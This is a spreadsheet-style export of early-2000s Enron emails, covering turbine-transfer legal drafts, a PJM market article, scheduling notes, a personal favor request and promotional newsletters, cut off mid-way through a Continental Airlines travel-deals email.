between Williams (NYSE:WMB) and Duke Energy (NYSE:DUK). Williams_x000D_
(Tulsa, Okla.) is a $32 billion energy company delivering 16 percent_x000D_
of all natural gas consumed in the U.S. through a network of over_x000D_
27,000 miles of pipelines. Duke Energy (Charlotte, N.C.) is a diverse_x000D_
energy company with revenues of over $22 billion in 2000._x000D_
	   Industrialinfo.com provides daily news related to the industrial_x000D_
market place including industry alerts and databases for the energy_x000D_
and industrial markets. For more information on trends and upcoming_x000D_
construction activities for the Oil &amp; Gas Transmission industry as_x000D_
well as other industrial sectors send inquiries to_x000D_
oilandgastransmissiongroup@industrialinfo.com or visit us at_x000D_
www.iirenergy.com and www.industrialinfo.com._x000D_
_x000D_
    --30--HM/ho*_x000D_
_x000D_
    CONTACT: Industrialinfo.com, Houston_x000D_
             Joseph Govreau, 713/783-5147_x000D_
_x000D_
    KEYWORD: TEXAS FLORIDA NORTH CAROLINA OKLAHOMA MISSISSIPPI_x000D_
    INDUSTRY KEYWORD: BUILDING/CONSTRUCTION CHEMICALS/PLASTICS_x000D_
ENERGY OIL/GAS UTILITIES_x000D_
    SOURCE: Industrialinfo.com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Mon, 8 Jan 2001 05:13:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kwiemer@milbank.com'})</t>
  </si>
  <si>
    <t>frozenset({'kay.mann@enron.com', 'lisa.bills@enron.com', 'roger.ondreko@enron.com', 'john.cody@csfb.com', 'roseann.engeldorf@enron.com', 'catherine.clark@enron.com'})</t>
  </si>
  <si>
    <t>RE: CA Development</t>
  </si>
  <si>
    <t>Attached are our comments to the Assignment and Assumption and the Bill of _x000D_
Sale as noted earlier.? I look forward to seeing revised drafts and forms for _x000D_
the purchase by CAED II. _x000D_
_x000D_
Regards, Karl _x000D_
_x000D_
 &lt;&lt;enxt cmnts .PDF&gt;&gt; _x000D_
_x000D_
-----Original Message----- From:?? Kay.Mann@enron.com _x000D_
[SMTP:Kay.Mann@enron.com] Sent:?? Friday, January 05, 2001 5:39 PM To:???? _x000D_
Lisa.Bills@enron.com; Roseann.Engeldorf@enron.com; Catherine.Clark@enron.com; _x000D_
john.cody@csfb.com; kwiemer@milbank.com; Roger.Ondreko@enron.com_x000D_
_x000D_
Subject:??????? CA Development _x000D_
_x000D_
(See attached file: Purchase Option Notice(CAED I)rev1.doc)(See attached _x000D_
file: Assumption with GE ack(CAEDI)rev1.DOC)(See attached file: Bill of _x000D_
salerev1.DOC) _x000D_
_x000D_
Attached are drafts of the documents to effect the transfer of two GE _x000D_
turbines and one ABB transformer to CAED I and CAED II.? The dates and _x000D_
amounts are bracketed, as pending the determination of the closing date. We _x000D_
will need sets for both CAED I and CAED II, with II receiving the _x000D_
transformer.? These will be prepared with the forms are agreed. _x000D_
_x000D_
These documents are subject to internal Enron review, but in the interest of _x000D_
time I am sending the documents to everyone. _x000D_
_x000D_
Thank you, _x000D_
_x000D_
Kay ?&lt;&lt; File: Purchase Option Notice(CAED I)rev1.doc &gt;&gt;? &lt;&lt; File: Assumption _x000D_
with GE ack(CAEDI)rev1.DOC &gt;&gt;? &lt;&lt; File: Bill of salerev1.DOC &gt;&gt; _x000D_
_x000D_
This e-mail message may contain legally privileged and/or confidential _x000D_
information. If you are not the intended recipient(s), or the employee or _x000D_
agent responsible for delivery of this message to the intended recipient(s), _x000D_
you are hereby notified that any dissemination, distribution or copying of _x000D_
this e-mail message is strictly prohibited. If you have received this message _x000D_
in error, please immediately notify the sender and delete this e-mail message _x000D_
from your computer. _x000D_
_x000D_
 - enxt cmnts .PDF</t>
  </si>
  <si>
    <t>Tue, 16 Jan 2001 04:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Managing Director and Vice President Elections</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks for your e:mail message and your voice mail at home.  I appreciate _x000D_
your nice thoughts.  _x000D_
_x000D_
I am in London all week - is there anything that you or Jo need that I could _x000D_
bring back for you?  Just let me know.  I will be back in the office next _x000D_
Monday, the 22nd.  --Sally _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Barry Pearce @ ENRON COMMUNICATIONS_x000D_
	01/13/2001 11:38 AM_x000D_
	_x000D_
To: Sally Beck/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Managing Director and Vice President Elections_x000D_
_x000D_
Congrats Sal - very very well deserved._x000D_
_x000D_
You are a top class colleague._x000D_
_x000D_
Barry._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 23 Apr 2001 05:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Dude:_x000D_
Two things.  First, in the midst of the craziness on Friday, my black, _x000D_
Northface parka ended up getting put someplace at Sarah's that I wasn't _x000D_
privvy to, and consequently I couldn't find it.  My house keys are in it, so _x000D_
it would great to get it back.  Could you check with Bob/Sarah and see if _x000D_
it's floating around someplace over there?  Muchos gracias._x000D_
_x000D_
Second, could you do me a favor?  Could you pay me the full amount for Squaw _x000D_
and then collect from Cameron for what she owes you?  Sorry to be a pain in _x000D_
the ass, but I think logistically, it'll be a whole helluvalot easier to _x000D_
manage it that way (at least from my end).  And to be an even bigger _x000D_
pain.....since my schedule's a disaster with school coming to a close, could _x000D_
you stick the check in the mail?  My address is:_x000D_
_x000D_
366 Dolores St., #3_x000D_
SF, 94110_x000D_
_x000D_
Sorry for all the hassle._x000D_
_x000D_
Happy birthday, man._x000D_
_x000D_
Best,_x000D_
Jeff</t>
  </si>
  <si>
    <t>Fri, 1 Dec 2000 09:20:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'positiveliving-html@emazing.com'})</t>
  </si>
  <si>
    <t>EMAZING Positive Living Tip of the Day - Get Rid Of The Past!</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LET YOUR LAPTOP COMPUTER CONNECT TO THE INTERNET WIRELESSLY_x000D_
=09=09Sign up today for the Sierra Aircard and connect to the Internet Anyt=_x000D_
ime,=20_x000D_
Anywhere.  Simply slip the Aircard into your PC slot and you=01,re connecte=_x000D_
d.=20_x000D_
Order today and save $100, plus our 2-week money back guarantee. Click  her=_x000D_
e=20_x000D_
for more details.  =20_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09Positive Living Tip of the Day_x000D_
=09=09Friday December 1, 2000_x000D_
=09=09_x000D_
=09=09Get Rid Of The Past! =20_x000D_
=09=09_x000D_
=09=09Do you struggle with the questions, "Will I ever recover?" and "Will =_x000D_
I ever=20_x000D_
lead a normal life?" If so, you must begin to think positively!_x000D_
=09=09_x000D_
=09=09Whatever your emotional wounds, you can eventually heal and lead a po=_x000D_
sitive=20_x000D_
life. This is what you must say to yourself in order to lead the best life=_x000D_
=20_x000D_
possible. Remember, the journey to living positively begins with a single=_x000D_
=20_x000D_
step. Be patient with yourself along the way and take credit for your=20_x000D_
progress.=20_x000D_
=09=09_x000D_
=09=09For example, if you are the victim of childhood abuse, it's normal fo=_x000D_
r you to=20_x000D_
question your abilities to parent for fear of abusing your own children. Bu=_x000D_
t=20_x000D_
many abused children grow up to be great parents who "choose" not to follow=_x000D_
=20_x000D_
in the footsteps of their abusers. However, if you have decided not to have=_x000D_
=20_x000D_
children due to this fear, give yourself credit for making the best decisio=_x000D_
n=20_x000D_
for yourself at this particular time in your life._x000D_
=09=09_x000D_
=09=09- CG, Licensed Clinical Professional Counselor_x000D_
=09=09_x000D_
=09=09Email  this tip to a friend - Browse  the Archives_x000D_
=09=09_x000D_
=09=09Have a question for the writer of this tip? Please send it to us by c=_x000D_
licking=20_x000D_
on the feedback button! This tip is in no way a substitute for professional=_x000D_
=20_x000D_
advice. If you are dealing with a serious issue, please consult your=20_x000D_
physician or other health professional._x000D_
=09=09_x000D_
=09=09[IMAGE]_x000D_
=09=09_x000D_
=09=09The holidays are here!_x000D_
=09=09So get your warm wishes and season's greetings out to all with EMAZIN=_x000D_
G's=20_x000D_
eGreetings! They're fun, FREE, and cover all those merry, bright, and=20_x000D_
seasonal occasions. =20_x000D_
=09=09_x000D_
=09=09Holiday gift shopping made easy..._x000D_
=09=09It's Flooz!  The online gift currency you send by email! =20_x000D_
=09=09_x000D_
=09=09Want Coupons, FREESTUFF, &amp; More? Click Into CoolSavings_x000D_
=09=09CoolSavings is the place to save BIG on all your favorite things from=_x000D_
 all=20_x000D_
your favorite stores and online retailers this Holiday season. =20_x000D_
=09=09_x000D_
=09=09Don't spend Christmas without the Grinch..._x000D_
=09=09Save up to 40% at Amazon's Dr. Seuss Shop! =20_x000D_
=09=09_x000D_
=09=09=20_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09[IMAGE]_x000D_
=09=09[IMAGE]_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09   =20_x000D_
=09=09_x000D_
=09=09Tip Gift_x000D_
=09=09POSITIVE LIVING BOOK OF THE DAY_x000D_
=09=09Thomas Barksdale: It's All About You_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09Tip Gift_x000D_
=09=09MOVIE OF THE DAY_x000D_
=09=09Left Behind_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09Book_x000D_
=09=09BOOK  OF THE DAY_x000D_
=09=09Olaf Olafsson: The Journey Home_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09CD_x000D_
=09=09CD  OF THE DAY_x000D_
=09=09Enya: A Day Without Rain_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09Gift_x000D_
=09=09 GIFT  OF THE DAY_x000D_
=09=09Nintendo: Hey You, Pikachu!_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09DVD_x000D_
=09=09MOVIE  OF THE DAY (DVD)_x000D_
=09=09George Clooney: The Perfect Storm_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09VHS_x000D_
=09=09MOVIE  OF THE DAY (VHS)_x000D_
=09=09Fantasia 2000_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09Quote_x000D_
=09=09QUOTE  OF THE DAY_x000D_
=09=09I have never let my schooling interfere with my education._x000D_
=09=09- Mark Twain_x000D_
=09=09_x000D_
=09=09=20_x000D_
=09=09_x000D_
=09=09[IMAGE]_x000D_
=09=09[IMAGE]_x000D_
=09=09_x000D_
=09=09  =20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Thu, 5 Jul 2001 09:11:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'linda.robertson@enron.com', 'james.steffes@enron.com', 'christi.nicolay@enron.com', 'mark.palmer@enron.com', 'richard.shapiro@enron.com'})</t>
  </si>
  <si>
    <t>Report: CA Energy Crisis Overshadows Success Of PJM</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Sarah Novosel/Corp/Enron on 07/05/2001 02:36 PM -----_x000D_
_x000D_
	Nancy Bagot_x000D_
	07/05/2001 10:00 AM_x000D_
		 _x000D_
		 To: Ray Alvarez/NA/Enron@ENRON, Sarah Novosel/Corp/Enron@ENRON, Donna _x000D_
Fulton/Corp/Enron@ENRON_x000D_
		 cc: _x000D_
		 Subject: Report: CA Energy Crisis Overshadows Success Of PJM_x000D_
_x000D_
_x000D_
NGI's Daily Gas Price Index _x000D_
published : July 3, 2001_x000D_
Report: CA Energy Crisis Overshadows Success Of PJM _x000D_
While some may argue that California's energy woes offer a prime reason for _x000D_
placing the electric competition genie firmly back in its bottle, a recent _x000D_
case study by a global consulting group asserts that California's energy _x000D_
difficulties mask the fact that other power markets in the United States are _x000D_
not only surviving, but thriving, with the PJM market serving as the perfect _x000D_
example. _x000D_
The report by PA Consulting, "PJM - Electric Power Competition That Works," _x000D_
notes that in the wake of California's energy crisis, the future of electric _x000D_
power restructuring and deregulation in the United States is increasingly _x000D_
being called into question. The growing national debate over the fate of _x000D_
electric power restructuring is couched more and more in stark terms of "to _x000D_
be, or not to be." But PA Consulting argues that this "simplistic debate" _x000D_
presents the nation with the choice of either pushing ahead with _x000D_
restructuring and potentially facing California-like difficulties in other _x000D_
parts of the country or reverting back to a more intrusive, _x000D_
command-and-control regulatory system. _x000D_
In PA Consulting's view, limiting the national debate to these two extremes _x000D_
ignores the fact that California is not the typical model for competitive _x000D_
wholesale electricity markets. "Indeed, there are several competitive _x000D_
wholesale markets at work in the United States that differ significantly from _x000D_
California's in both structure and results." One of the most "dynamic, robust _x000D_
and successful" of these other regional wholesale electricity markets is the _x000D_
Pennsylvania-New Jersey-Maryland (PJM) market in the mid-Atlantic region, the _x000D_
study asserts. "Understanding why the PJM model has succeeded in many areas _x000D_
where the California model has failed may provide regulators, legislators and _x000D_
other interested groups with a powerful reference point in the growing debate _x000D_
concerning whether continued market reform in the electric power industry is _x000D_
in our future." _x000D_
The report notes that PJM offers an interesting example for a competitive _x000D_
market case study because it is similar in size to the California market and _x000D_
has a longer track record of spot market operations. While there are _x000D_
similarities in market size and spot market longevity, significant _x000D_
differences exist between PJM and California in terms of regulatory _x000D_
jurisdiction and market composition, according to PA Consulting. _x000D_
More specifically, the study points out that in terms of regulatory _x000D_
authority, the PJM market -- unlike California's -- overlaps the jurisdiction _x000D_
of five states and the District of Columbia. In some ways, the multiple _x000D_
regulatory jurisdictions within PJM have allowed the market and market _x000D_
operator to remain largely independent of any one regulatory authority. In _x000D_
contrast, single-state markets such as California and New York have state _x000D_
regulators and legislatures that wield considerable influence and a stronger _x000D_
sense of ownership of the market and its actions, the study adds. Some have _x000D_
argued that this control has been exerted to the detriment of market function _x000D_
and independence, while FERC has been troubled by single-state control, the _x000D_
study went on to say. _x000D_
By way of comparison, the PJM experience illustrates that, in a market _x000D_
operating across multiple jurisdictions, no single state can dictate _x000D_
conditions. In such an environment, the wholesale market will be regulated _x000D_
primarily by the Federal Energy Regulatory Commission, reducing the influence _x000D_
of state politics and allowing the market to adopt a broader regional _x000D_
perspective, the study notes. _x000D_
"This case study provides a powerful counterpoint to those who would like to _x000D_
turn back the clock on electric power competition," said Phillip Harris, CEO _x000D_
of PJM. "Our market model provides a blueprint for a working competitive _x000D_
marketplace that has been refined during four years of successful operation." _x000D_
PA Consulting is a leading global management, systems and technology _x000D_
consulting firm. A copy of the full report can be downloaded at PA _x000D_
Consulting's web site at www.paconsulting.com. _x000D_
</t>
  </si>
  <si>
    <t>Re: Call w/ TECO tomorrow at 10:30 Central</t>
  </si>
  <si>
    <t xml:space="preserve">Anything for you!!!!!!  Have you spilled anything else today?_x000D_
_x000D_
_x000D_
_x000D_
	Kay Mann@ENRON_x000D_
	05/29/2001 03:01 PM_x000D_
		 _x000D_
		 To: Suzanne Adams/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Call w/ TECO tomorrow at 10:30 Central_x000D_
_x000D_
for calendar, especially 930_x000D_
_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 05/29/2001 03:01 _x000D_
PM ---------------------------_x000D_
From: Ben Jacoby/ENRON@enronXgate on 05/29/2001 02:59 PM_x000D_
To: Fred Mitro/ENRON@enronXgate, Kay Mann/Corp/Enron@Enron_x000D_
cc: Lorie Leigh/ENRON@enronXgate _x000D_
_x000D_
Subject: Call w/ TECO tomorrow at 10:30 Central_x000D_
_x000D_
TECO has asked that we schedule our call for tomorrow at 10:30 AM. Kay, I _x000D_
would like to meet with you at 9:30 to discuss the MOU. I don't believe their _x000D_
counsel will be on the call at 10:30, therefore your participation is _x000D_
optional (although you know we'd always prefer to have you)._x000D_
_x000D_
Regards,_x000D_
_x000D_
Ben_x000D_
_x000D_
Lorie:_x000D_
_x000D_
Please put the TECO call on my and Fred's calendar. Thanks._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 4 May 2001 17:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'gary.hickerson@enron.com', 'vince.kaminski@enron.com'})</t>
  </si>
  <si>
    <t>Candlestick Charts</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
FYI fallout_x000D_
---------------------- Forwarded by Mike A Roberts/HOU/ECT on 05/04/2001 02:05 PM ---------------------------_x000D_
From:	Sue Neville/ENRON@enronXgate on 05/04/2001 02:02 PM_x000D_
To:	Mike A Roberts/HOU/ECT@ECT_x000D_
cc:	Lee Ferrell/ENRON@enronXgate, Kent Miller/ET&amp;S/Enron@ENRON _x000D_
Subject:	Candlestick Charts_x000D_
_x000D_
Mike,_x000D_
_x000D_
I work for Enron Transportation and Storage in their Storage Marketing group.  My group has been using technical analysis from your website to help make daily storage trading revenue decisions.  On your web site, you indicated you would be discontinueing some of the information we use.  We had interviewed external technical service profiders, and chose not to buy their service because we had your information available to us to help us make financial decisions.  Specifically, we need the candlestick charts and analysis on natural gas, and we also need the elliot wave analysis on natural gas.  _x000D_
_x000D_
Can you please reconsider your decision to discontinue the technical analysis data aforementioned?_x000D_
_x000D_
_x000D_
Sue Neville_x000D_
Director, Storage Marketing_x000D_
ETS_x000D_
</t>
  </si>
  <si>
    <t>Fri, 16 Nov 2001 12:33:16 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'monica.l.brown@accenture.com'})</t>
  </si>
  <si>
    <t>RE: 2nd Final Signoff Notification: Futures &amp; Options</t>
  </si>
  <si>
    <t xml:space="preserve">i am out until next weds. will get back to you then_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	monica.l.brown@accenture.com@ENRON  _x000D_
Sent:	Thursday, November 15, 2001 4:09 PM_x000D_
To:	Quigley, Dutch_x000D_
Cc:	sheri.a.righi@accenture.com_x000D_
Subject:	2nd Final Signoff Notification: Futures &amp; Options_x000D_
_x000D_
Hi Dutch,_x000D_
_x000D_
Per our conversation today, I am resending the questions and concerns that_x000D_
I have on the Futures and Options practice questions/graphic ideas.  It is_x000D_
very important that we setup some time with you next week or the week after_x000D_
Thanksgiving.  Let me know what your schedule looks like._x000D_
_x000D_
I need final signoffs on the Futures and Options practice_x000D_
exercises/graphics.  The deadline for this was today.  I need to know if_x000D_
you are okay with the graphic ideas and practice questions that you've seen_x000D_
so far for the Futures and Options._x000D_
_x000D_
Questions and Concerns: I know you have seen these questions several times,_x000D_
so I pointed out the areas that I need your help._x000D_
(1.) I need help with question #4 in Options.  I need help developing the_x000D_
graphic for this question._x000D_
(2.) I need the answers to the scenario questions that you created and the_x000D_
explanation for the answers._x000D_
_x000D_
Attached below are the two topics that you are responsible for in the_x000D_
Knowledge System._x000D_
(See attached file: Futures Graphic ideas and practices_2.doc)(See attached_x000D_
file: Options Graphic ideas and practices_3.doc)_x000D_
_x000D_
Thanks,_x000D_
Monica L. Brown_x000D_
Accenture_x000D_
Houston - 2929 Allen Parkway_x000D_
Direct Dial: +1 713 837 1749_x000D_
VPN &amp; Octel: 83 / 71749_x000D_
Fax: +1 713 257 7211_x000D_
email: monica.l.brown@accenture.com_x000D_
_x000D_
_x000D_
_x000D_
This message is for the designated recipient only and may contain_x000D_
privileged, proprietary, or otherwise private information.  If you have_x000D_
received it in error, please notify the sender immediately and delete the_x000D_
original.  Any other use of the email by you is prohibited._x000D_
 - Futures Graphic ideas and practices_2.doc &lt;&lt; File: Futures Graphic ideas and practices_2.doc &gt;&gt; _x000D_
 - Options Graphic ideas and practices_3.doc &lt;&lt; File: Options Graphic ideas and practices_3.doc &gt;&gt; </t>
  </si>
  <si>
    <t>Thu, 4 Jan 2001 07:59:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Exhibit M-1 of CA Energy Development/ABB Facility Agreement</t>
  </si>
  <si>
    <t xml:space="preserve">Please email directly, copy to Ben, Fred and me._x000D_
_x000D_
Thanks.  I really appreciate all your good work, and will pass that along to _x000D_
David Runnels and Paul Pipitone soon._x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Thompson, Peter J." &lt;peterthompson@akllp.com&gt; on 01/04/2001 03:54:34 PM_x000D_
To: "Kay Mann (E-mail)" &lt;kay.mann@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: Exhibit M-1 of CA Energy Development/ABB Facility Agreement_x000D_
_x000D_
Yesterday, Mike Sandridge faxed me an addition to the spare parts listed_x000D_
on Exhibit M-1.  The additional spare parts were "Lot Spare Bushings"._x000D_
However, the information he provided does not show the expected purchase_x000D_
lead time, which is provided for other items in Exhibit M-1.  It is a_x000D_
minor issue, but can I e-mail Mike directly for clarification, or would_x000D_
you have someone on the business team pass this along?_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 8 May 2001 18:15:05 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'continental_airlines_inc_050801@airmail.continental.com'})</t>
  </si>
  <si>
    <t>ONEPASS MEMBER CO.O.L. TRAVEL SPECIALS FOR Mathew Smith</t>
  </si>
  <si>
    <t>=20_x000D_
 [IMAGE] CO.O.L. Travel Specials [IMAGE]  Wednesday, May 09, 2001         S=_x000D_
pecials for Mathew Smith[IMAGE]   Fare Sale [IMAGE]  Summer Fare Sale   Sav=_x000D_
e even more on continental.com off already low sale fares within the U.S. a=_x000D_
nd between the U.S., Canada, Latin America, Mexico, the Caribbean, Europe, =_x000D_
Asia and the Pacific. Don't wait.  These seats are limited. For details and=_x000D_
 to purchase your ticket now visit:www.continental.com    Click for more in=_x000D_
fo         This week's e-mail includes: CO.O.L. Travel Specials , Featured =_x000D_
Fares , Westin Hotels &amp; Resorts, Sheraton Hotels &amp; Resorts, Four Points by =_x000D_
Sheraton, St. Regis, The Luxury Collection and W Hotels Offers , Hilton Hot=_x000D_
el &amp; Resort Offers ,  Alamo Rent A Car Offers , National Car Rental Offers =_x000D_
.   CO.O.L. Travel Specials  Airport Hubs  This week's specials are good fo=_x000D_
r the following markets departing Saturday, May 12 and returning on either =_x000D_
Monday, May 14 or Tuesday, May 15, 2001. Please see the Terms and Condition=_x000D_
s  listed at the end of this e-mail. OnePass Miles CO.O.L. Travel Specials =_x000D_
Offers    For OnePass members, here are special opportunities to redeem mil=_x000D_
es for travel to the following destinations. As an additional benefit, OneP=_x000D_
ass Elite members can travel using the miles below as the only payment nece=_x000D_
ssary.   To use your OnePass miles (as listed below) to purchase CO.O.L. Tr=_x000D_
avel Specials, you must call 1-800-642-1617. There will not be an additiona=_x000D_
l $20 charge when redeeming OnePass miles for CO.O.L. Travel Specials throu=_x000D_
gh the toll-free reservations number.  If not using your OnePass miles, pur=_x000D_
chase CO.O.L. Travel Specials online until 11:59pm (CST) Friday at www.cont=_x000D_
inental.com . You can also purchase CO.O.L. Travel Specials for an addition=_x000D_
al cost of $20 per ticket through our toll-free reservations number at 1-80=_x000D_
0-642-1617.  Travel may originate in either city. From/To Cleveland  $29 + =_x000D_
15,000 Miles or $149   -   Boston, MA  $29 + 12,500 Miles or $119   -   Day=_x000D_
ton, OH $29 + 12,500 Miles or $119  -   Grand Rapids, MI $29 + 15,000 Miles=_x000D_
 or $149  -   Hartford, CT $29 + 12,500 Miles or $119  -   Indianapolis, IN=_x000D_
 $29 + 12,500 Miles or $129   -   Madison, WI $29 + 12,500 Miles or $129  -=_x000D_
   Milwaukee, WI $29 + 12,500 Miles or $139   -   Raleigh Durham, NC  From/=_x000D_
To Houston  $29 + 12,500 Miles or $119   -   Baton Rouge, LA $29 + 12,500 M=_x000D_
iles or $139   -   Nashville, TN $29 + 12,500 Miles or $119   -   New Orlea=_x000D_
ns, LA $29 + 12,500 Miles or $119   -   Shreveport, LA $29 + 12,500 Miles o=_x000D_
r $139  -   West Palm Beach, FL  From/To New York/Newark  $29 + 17,500 Mile=_x000D_
s or $219  -   Austin, TX $29 + 12,500 Miles or $139   -   Jacksonville, FL=_x000D_
 $29 + 15,000 Miles or $159   -   Nashville, TN $29 + 12,500 Miles or $119 =_x000D_
 -   Richmond, VA    return to top     Featured Fares Sample Destination  C=_x000D_
hoose your fare, find your flight. Or, quickly sift through all our great f=_x000D_
eatured fares by choosing a destination or origin. Be spontaneous. Get out =_x000D_
of town. Current Featured Fares destinations include:  New York, Atlanta, H=_x000D_
ouston,  Cleveland, Phoenix, and many more.  Note: Featured Fares change of=_x000D_
ten. To see a regularly-updated online list and purchase our Featured Fares=_x000D_
, visit the Web site at: www.continental.com   (Capacity controls and other=_x000D_
 restrictions apply.)   [IMAGE]   Partner Hotel Specials   Starwood Hotels =_x000D_
CO.O.L. Travel Specials Last-minute Weekend Rates from Westin Hotels &amp; Reso=_x000D_
rts, Sheraton Hotels &amp; Resorts, Four Points by Sheraton, St. Regis, The Lux=_x000D_
ury Collection and W Hotels  Visit our site for booking these and other Las=_x000D_
t-Minute Weekend Rates for  this weekend May 12 - May 15, 2001.  promo.star=_x000D_
wood.com/csco   Indiana Indianapolis - The Westin Indianapolis - $87.00  In=_x000D_
dianapolis - The Sheraton Indianapolis - $76.00   Louisiana Baton Rouge - S=_x000D_
heraton Baton Rouge - $75.00  New Orleans - W New Orleans - $159.00  New Or=_x000D_
leans - Sheraton New Orleans - $99.00   Maryland Annapolis - Sheraton Barce=_x000D_
lo Annapolis - $123.00  Towson - Sheraton Baltimore north - $97.00   Massac=_x000D_
husetts Boston - The Westin Copley  - $179.00  Boston - Sheraton Boston - $=_x000D_
189.00  Boston - Sheraton Braintree - $119.00  Danvers - Sheraton Ferncroft=_x000D_
 - $105.00  Framingham - Sheraton Newton - $109.00  Needham - Sheraton Need=_x000D_
ham - $107.00  Newton - Sheraton Newton - $109.00  Wakefield - Sheraton Col=_x000D_
onial - $90.00  Waltham - Westin Waltham - $90.00  Waltham - Four Points Wa=_x000D_
lthaam - $100.00   New Jersey Eatontown - Sheraton Eatontown - $99.00  Edis=_x000D_
on - Sheraton Edison - $69.00  Elizabeth - Four Points by Sheraton Newark -=_x000D_
 $71.00  Parsippany - Sheraton Parsippany - $70.00  Piscataway - Four Point=_x000D_
s by Sheraton Piscataway - $65.00  New York Jamaica - Sheraton JFK - $103.0=_x000D_
0  New York City - St. Regis - $580.00  New York City - Sheraton Russell - =_x000D_
$179.00  New York City - Sheraton Manhattan - $169.00   Ohio Cincinnati - W=_x000D_
estin Cincinati - $90.00  Cuyahoga Falls - Westin Cincinati - $90.00   Tenn=_x000D_
esse Nashville - Sheraton Music City - $59.00   Texas Austin - Sheraton Aus=_x000D_
tin - $70.00  Frisco - Sheraton Stonebrier - $102.00  Houston - Westin Gall=_x000D_
eria Houston - $64.00  Houston - Westin Oaks - $70.00  Houston - Sheraton H=_x000D_
ouston Brookhollow - $65.00  Houston - Sheraton Suites Houston - $71.00  Ho=_x000D_
uston - Sheraton North Houston - $64.00   Washington D.C. District of Colum=_x000D_
bia - Sheraton Premiere at Tysons Corner - $69.00    Washington Seattle - W=_x000D_
 Seattle - $160.00  Seattlle - Westin Seattle - $114.00   Wisconsin Brookfi=_x000D_
eld - Sheraton Milwaukee Brookfield - $65.00   For complete details on thes=_x000D_
e offers, please refer to the terms and conditions  below.   return to top =_x000D_
    CO.O.L. Travel Specials on Hilton Hotels and Resorts  Hilton logo   The=_x000D_
 following rates are available May 12 - 14, 2001 and are priced per night. =_x000D_
Cities listed are for the nearest airport, not necessarily for the location=_x000D_
 of the hotel.   Austin, TX Doubletree Hotel Austin, Austin, TX - $79  Doub=_x000D_
letree Guest Suites Austin, Austin, TX - $129   Boston, MA Doubletree Guest=_x000D_
 Suites Boston, Boston, MA - $189  Hilton Dedham Place, Dedham, MA - $175  =_x000D_
University Park Hotel at MIT-Cambridge, Cambridge, MA - $179   Cleveland, O=_x000D_
H Hilton Cleveland East/Beachwood, Beachwood, OH - $99   Dayton, OH Doublet=_x000D_
ree Guest Suites Dayton/Miamisburg,  Miamisburg, OH - $94   Hartford, CT Do=_x000D_
ubletree Hotel Bradley International Airport,  Windsor Locks, CT - $189   H=_x000D_
ouston, TX Hilton Houston Southwest, Houston, TX - $109  Doubletree Hotel H=_x000D_
ouston-Post Oak, Houston, TX - $165  Hilton Houston Hobby Airport, Houston,=_x000D_
 TX - $88   Indianapolis, IN Doubletree Guest Suites Indianapolis/Carmel, C=_x000D_
armel, IN - $99   New Orleans, LA Doubletree Hotel New Orleans-Lakeside, Me=_x000D_
tairie, LA - $139   New York, NY &amp; Newark, NJ Hilton Hasbrouck Heights, Has=_x000D_
brouck Heights, NJ - $159  Hilton Newark Gateway, Newark, NJ - $229  Hilton=_x000D_
 New York, New York, NY - $179/Night, 5/12-13  Hilton Parsippany, Parsippan=_x000D_
y, NJ - $89, 5/12-14  Millenium Hilton Next to the World Trade Center, New =_x000D_
York, NY - $275   Palm Beach, FL Doubletree Hotel Palm Beach Gardens, Palm =_x000D_
Beach Gardens, FL - $79   Raleigh, NC  Hilton North Raleigh, Raleigh, NC - =_x000D_
$119   To book this week's special rates for Hilton Family Hotels, visit an=_x000D_
d book at www.hilton.com/specials/values_main.html   Special rates apply on=_x000D_
ly for the dates listed at each hotel and are subject to availability. Chec=_x000D_
k hilton.com  for specific dates at each Hilton Family Hotel. Or call at 1-=_x000D_
800-774-1500 and ask for Value Rates. Restrictions apply to these  rates.  =_x000D_
return to top  Partner Car Rental Specials CO.O.L. Travel Specials from Ala=_x000D_
mo Rent A Car  This week, Alamo_x000D_
 offers great rates in the following cities. Rates  listed below are valid =_x000D_
on compact class cars at airport locations listed.  Other car types may be =_x000D_
available.  Rates are valid for rentals on Saturday,  May 12, 2001 with ret=_x000D_
urns Monday, May 14, 2001 or Tuesday,  May 15, 2001.  Alamo logo    $20 a d=_x000D_
ay in: Austin, TX (AUS)  $26 a day in: Hartford, CT (BDL)  $18 a day in: Na=_x000D_
shville, TN (BNA)  $26 a day in: Boston, MA (BOS)  $19 a day in: Cleveland,=_x000D_
 OH (CLE)  $17 a day in: Houston, TX (IAH)  $20 a day in: Indianapolis, IN =_x000D_
(IND)  $26 a day in: Jacksonville, FL (JAX)  $19 a day in: Milwaukee, WI (M=_x000D_
KE)  $26 a day in: New Orleans, LA (MSY)  $25 a day In: Newark, NJ (EWR)  $=_x000D_
